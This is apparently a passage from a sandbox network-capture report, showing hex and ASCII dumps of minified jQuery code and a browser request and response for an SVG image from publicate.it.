                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        78192.168.2.549854104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC922OUTGET /images/send_client.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _ga=GA1.2.1381680606.1725034579; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC753INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:23 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 18810
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "497a-620aa1d1e6229"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Azqtn%2Fd0lellqyw2DK6Qt1iAxvZPhPOg8OIFwAuHpqZsOIb%2BADbcWKq7NdVaqUL5iS83ouMZyE3pY40mZURQVaoz%2Fy553hbqNWnqTQ9w0YyWZ92nuMjahenU%2BYRyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615c33c310f79-EWR
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC616INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 33 36 70 78 22 20 68 65 69 67 68 74 3d 22 31 33 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 33 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 36 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 30 2e 33 32 35 2c 30 20 4c 31 30 37 2e 36 37 35
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <title>6</title> <defs> <path d="M10.325,0 L107.675
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 73 3d 22 30 2e 35 22 20 6f 70 65 72 61 74 6f 72 3d 22 64 69 6c 61 74 65 22 20 69 6e 3d 22 53 6f 75 72 63 65 41 6c 70 68 61 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4d 6f 72 70 68 6f 6c 6f 67 79 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 4f 66 66 73 65 74 20 64 78 3d 22 30 22 20 64 79 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 53 70 72 65 61 64 4f 75 74 65 72 31 22 20 72 65 73 75 6c 74 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22 3e 3c 2f 66 65 4f 66 66 73 65 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 65 47 61 75 73 73 69 61 6e 42 6c 75 72 20 73 74 64 44 65 76 69 61 74 69 6f 6e 3d 22 34 22 20 69 6e 3d 22 73 68 61 64 6f 77 4f 66 66 73 65 74 4f 75 74 65 72 31 22
                                                                                                                                                                                                        Data Ascii: s="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology> <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset> <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1"
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 5a 41 41 41 41 47 51 43 41 59 41 41 41 43 41 76 7a 62 4d 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 45 52 6c 57 45 6c 6d 54 55 30 41 4b 67 41 41 41 41 67 41 41 59 64 70 41 41 51 41 41 41 41 42 41 41 41 41 47 67 41 41 41 41 41 41 41 36 41 42 41 41 4d 41 41 41 41 42 41 41 45 41 41 4b 41 43 41 41 51 41 41 41 41 42 41 41 41 42 6b 4b 41 44 41 41 51 41 41 41 41 42 41 41 41 42 6b 41 41 41 41 41 41 62 4d 57 2f 4d 41 41 41 77 65 55 6c 45 51 56 52 34 41 65 33 64 65 5a 78 63 56 5a 6e 77 38 65 66 65 57 6e 70 4a 5a 2b 73 6b 4a 4f 6b 6b 44 51 6c 4a 53 4d 4a 45 42 6c 64 30 56 45 41 46 41 73 50 4d 67 49 67 4c 59 48 43 49 43 43 71 4f 5a 6c 37 31 66 66 39 34 35 33 58 57 7a 30 66
                                                                                                                                                                                                        Data Ascii: iVBORw0KGgoAAAANSUhEUgAAAZAAAAGQCAYAAACAvzbMAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABkKADAAQAAAABAAABkAAAAAAbMW/MAAAweUlEQVR4Ae3deZxcVZnw8efeWnpJZ+skJOkkDQlJSMJEBld0VEAFAsPMgIgLYHCICCqOZl71ff9453XWz0f
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 39 6a 34 6d 7a 64 65 4f 75 59 78 56 59 56 66 71 55 54 53 62 33 74 56 61 6c 30 2b 45 6b 69 46 75 45 34 63 46 39 37 65 74 6a 6a 64 4b 47 2f 4c 46 6c 4e 76 56 63 33 63 69 39 51 2f 53 36 61 6b 4a 43 57 71 52 34 6f 48 41 67 67 6b 52 45 44 31 65 45 6c 2f 6f 53 44 46 67 76 51 50 46 50 33 6e 69 76 6e 67 2b 32 31 66 6d 2f 45 39 6c 55 53 65 53 77 6a 42 73 4b 70 4a 41 6a 6e 42 70 4a 4c 48 78 59 76 75 33 48 66 44 37 38 33 79 72 39 76 63 48 69 78 4b 70 34 6f 54 66 4a 55 34 53 6f 2b 4b 66 36 45 4d 53 35 55 6e 49 59 42 41 76 41 55 71 66 75 64 44 6c 55 55 47 63 74 36 52 69 32 62 58 50 66 58 73 6c 75 35 48 74 6a 35 38 77 53 39 55 49 6d 6d 4c 64 77 57 72 55 2f 6f 54 6e 35 44 56 65 62 4d 34 76 6f 74 4b 48 50 55 72 64 39 7a 2b 6c 6d 41 67 2b 4d 68 7a 4c 2b 5a 75 50 64 49 58
                                                                                                                                                                                                        Data Ascii: 9j4mzdeOuYxVYVfqUTSb3tVal0+EkiFuE4cF97etjjdKG/LFlNvVc3ci9Q/S6akJCWqR4oHAggkRED1eEl/oSDFgvQPFP3nivng+21fm/E9lUSeSwjBsKpJAjnBpJLHxYvu3HfD783yr9vcHixKp4oTfJU4So+Kf6EMS5UnIYBAvAUqfudDlUUGct6Ri2bXPfXslu5Htj58wS9UImmLdwWrU/oTn5DVebM4votKHPUrd9z+lmAg+MhzL+ZuPdIX
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 41 42 42 49 77 49 4a 4b 41 56 34 6c 77 4c 5a 50 59 74 4f 35 72 71 36 2b 6f 57 31 47 58 5a 6f 38 54 49 4c 77 30 58 52 51 43 42 34 77 49 4a 61 49 55 34 39 30 2f 30 68 6b 6b 71 65 64 51 56 4a 35 65 32 4b 75 46 47 52 67 41 42 42 45 77 4b 4f 4e 34 4b 63 53 71 42 36 4f 36 72 56 38 35 4b 76 30 63 38 66 37 62 4a 65 34 5a 72 49 34 41 41 41 69 55 42 33 51 70 52 2f 2b 6d 78 6b 44 2f 34 76 65 77 74 36 6a 4e 71 6a 6b 73 79 54 6e 56 68 36 64 6b 4f 59 39 50 79 2b 72 71 73 71 70 62 4b 2f 43 77 37 64 2b 6c 57 70 53 34 49 78 46 54 67 52 43 76 6b 32 51 32 46 4f 64 4e 76 61 57 75 49 61 53 32 47 4c 4c 59 7a 4c 52 43 64 32 54 2f 32 78 2b 50 65 45 2f 6f 79 71 7a 54 7a 79 70 6d 61 44 52 6b 33 76 6f 6b 41 41 6e 45 52 55 4a 39 46 2b 6a 4d 70 6b 77 6e 47 54 42 75 62 6d 52 65 58 59
                                                                                                                                                                                                        Data Ascii: ABBIwIJKAV4lwLZPYtO5rq6+oW1GXZo8TILw0XRQCB4wIJaIU490/0hkkqedQVJ5e2KuFGRgABBEwKON4KcSqB6O6rV85Kv0c8f7bJe4ZrI4AAAiUB3QpR/+mxkD/4vewt6jNqjksyTnVh6dkOY9Py+rqsqpbK/Cw7d+lWpS4IxFTgRCvk2Q2FOdNvaWuIaS2GLLYzLRCd2T/2x+PeE/oyqzTzypmaDRk3vokAAnERUJ9F+jMpkwnGTBubmReXY
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 79 74 7a 4f 51 66 46 36 4e 6a 51 7a 7a 74 54 77 4e 41 51 54 4d 43 4a 42 41 7a 4c 68 7a 31 53 45 45 35 72 61 6b 5a 66 33 4b 36 58 4c 56 61 2b 70 6b 36 39 36 69 64 50 55 79 77 44 34 45 45 39 39 43 77 42 6f 42 45 6f 67 31 6f 61 41 67 5a 59 47 48 50 6a 35 5a 4e 71 36 61 4c 6c 75 32 35 61 58 6a 55 45 46 79 74 45 62 4b 4e 50 79 4a 67 46 55 43 4a 42 43 72 77 6b 46 68 79 67 49 7a 70 36 51 6b 66 4b 70 56 6c 72 79 75 58 6e 59 64 4b 4d 71 78 41 56 6f 6a 5a 52 76 2b 52 4d 41 57 41 52 4b 49 4c 5a 47 67 48 45 4d 4b 72 50 7a 6f 4a 46 6c 78 56 37 4e 73 62 47 4f 36 37 35 42 41 66 42 4d 42 67 77 49 6b 45 49 50 34 58 48 70 34 41 72 63 76 4f 54 37 64 31 2f 4d 44 61 64 76 48 64 4e 2f 68 71 66 45 73 42 4b 49 58 49 49 46 45 62 38 77 56 71 69 53 77 64 66 55 4d 75 66 65 65 69 55
                                                                                                                                                                                                        Data Ascii: ytzOQfF6NjQzztTwNAQTMCJBAzLhz1SEE5rakZf3K6XLVa+pk696idPUywD4EE99CwBoBEog1oaAgZYGHPj5ZNq6aLlu25aXjUEFytEbKNPyJgFUCJBCrwkFhygIzp6QkfKpVlryuXnYdKMqxAVojZRv+RMAWARKILZGgHEMKrPzoJFlxV7NsbGO675BAfBMBgwIkEIP4XHp4ArcvOT7d1/MDadvHdN/hqfEsBKIXIIFEb8wVqiSwdfUMufeeiU
                                                                                                                                                                                                        2024-08-30 16:16:23 UTC1369INData Raw: 53 59 78 36 44 4f 75 73 57 79 4d 54 56 57 74 6b 58 6b 74 47 37 72 6e 33 73 46 79 34 64 49 2b 78 57 70 54 50 47 73 6b 79 33 64 64 59 44 4c 69 77 48 51 49 6b 45 44 76 69 51 43 6d 47 49 61 42 62 49 34 33 31 61 6f 42 39 71 69 39 68 34 42 75 64 37 71 76 50 47 6a 6c 6c 75 6d 38 33 57 36 45 4d 49 34 51 38 78 54 45 42 45 6f 68 6a 41 55 31 43 64 58 7a 56 47 70 6c 63 4d 64 33 33 7a 73 39 31 47 71 74 32 65 62 70 76 67 32 71 4e 37 4f 30 4d 4a 4a 38 50 78 44 4e 57 47 69 36 4d 51 47 30 46 53 43 43 31 39 65 5a 71 56 52 49 6f 54 2f 65 64 56 5a 72 75 32 31 2f 61 54 38 76 59 34 6b 4d 31 33 58 66 39 79 75 6c 79 37 57 56 31 73 6d 31 76 55 62 70 37 57 58 78 59 70 54 44 7a 4e 70 59 4c 6b 45 41 73 44 78 44 46 4f 37 32 41 6e 75 36 62 31 53 76 59 4a 36 56 6c 30 52 7a 7a 69 77 39
                                                                                                                                                                                                        Data Ascii: SYx6DOusWyMTVWtkXktG7rn3sFy4dI+xWpTPGsky3ddYDLiwHQIkEDviQCmGIaBbI431aoB9qi9h4Bud7qvPGjllum83W6EMI4Q8xTEBEohjAU1CdXzVGplcMd33zs91Gqt2ebpvg2qN7O0MJJ8PxDNWGi6MQG0FSCC19eZqVRIoT/edVZru21/aT8vY4kM13Xf9yuly7WV1sm1vUbp7WXxYpTDzNpYLkEAsDxDFO72Anu6b1SvYJ6Vl0Rzziw9
